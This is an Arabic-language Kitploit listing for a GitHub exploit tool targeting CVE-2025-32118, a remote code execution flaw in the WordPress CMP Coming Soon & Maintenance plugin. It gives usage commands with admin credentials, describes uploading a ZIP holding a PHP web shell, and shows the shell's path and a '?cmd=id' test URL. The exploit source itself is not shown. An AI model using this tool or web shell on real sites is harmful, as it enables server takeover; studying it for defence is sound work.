Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2025-32118
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-32118

CVE-2025-32118

WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE)

عرض المستودع
111منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 CVE-2025-32118 - استغلال ثغرة RCE في إضافة CMP لووردبريس

🔍 العنوان: إضافة CMP – Coming Soon & Maintenance لووردبريس <= 4.1.13 - تنفيذ كود عن بُعد (RCE)
🗓️ النشر: 2025-04-04
🔐 CWE: CWE-434 - رفع ملفات بدون تقييد بنوع خطير
📊 CVSS: 9.1 (حرج) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


📜 الوصف

توجد ثغرة تنفيذ كود عن بُعد (RCE) حرجة في إضافة CMP – Coming Soon & Maintenance لووردبريس (<= 4.1.13).
يسمح هذا الخلل لمستخدم مدير موثوق (authenticated admin user) برفع ملفات ZIP ضارة تحتوي على قذائف PHP قابلة للتنفيذ، مما يؤدي إلى اختراق كامل للموقع.


💥 التأثير

  • رفع كود PHP عشوائي داخل دليل الإضافة
  • تنفيذ غير مقيد لأوامر النظام عبر قذيفة ويب
  • احتمالية السيطرة الكاملة على الخادم

⚙️ المتطلبات

  • موقع ووردبريس مع إضافة CMP الثغرة مثبتة (<= 4.1.13)
  • بيانات اعتماد مدير ووردبريس صالحة (مصادقة مطلوبة)

💻 الاستخدام

root@kitploit:~
python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password

✍️ الاستخدام (مخرجات المساعدة لواجهة الأوامر)

root@kitploit:~
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME   Admin username
  -p, --password PASSWORD    Admin password

📌 الوسائط:

الرايةالوصف
-uرابط قاعدة موقع ووردبريس
-unاسم المستخدم
-pكلمة المرور

🧪 ماذا يفعل:

  1. التحقق من صحة الدخول إلى لوحة تحكم ووردبريس.
  2. جلب nonce صالح لطلب الرفع.
  3. إنشاء ZIP ضار يحتوي على:
    • style.css (تنسيق قالب صالح)
    • nxploitedshell.php (حمولة RCE)
  4. رفع ZIP باستخدام وظيفة رفع القالب الثغرة.
  5. التحقق من القذيفة بتنفيذ ?cmd=whoami.

📂 موقع القذيفة

بمجرد الرفع بنجاح، ستكون القذيفة في:

root@kitploit:~
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php

اختبرها عبر:

root@kitploit:~
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id

❗ إخلاء مسؤولية

هذا الاستغلال لأغراض تعليمية فقط.
الاستخدام غير المصرح به لهذا الكود ضد أنظمة لا تملكها غير قانوني وغير أخلاقي.


🔗 المراجع

  • CVE-2025-32118 على MITRE
  • CWE-434: https://cwe.mitre.org/data/definitions/434.html

✒️ بواسطة:

Nxploited | Khaled Alenazi

تنزيل الأداة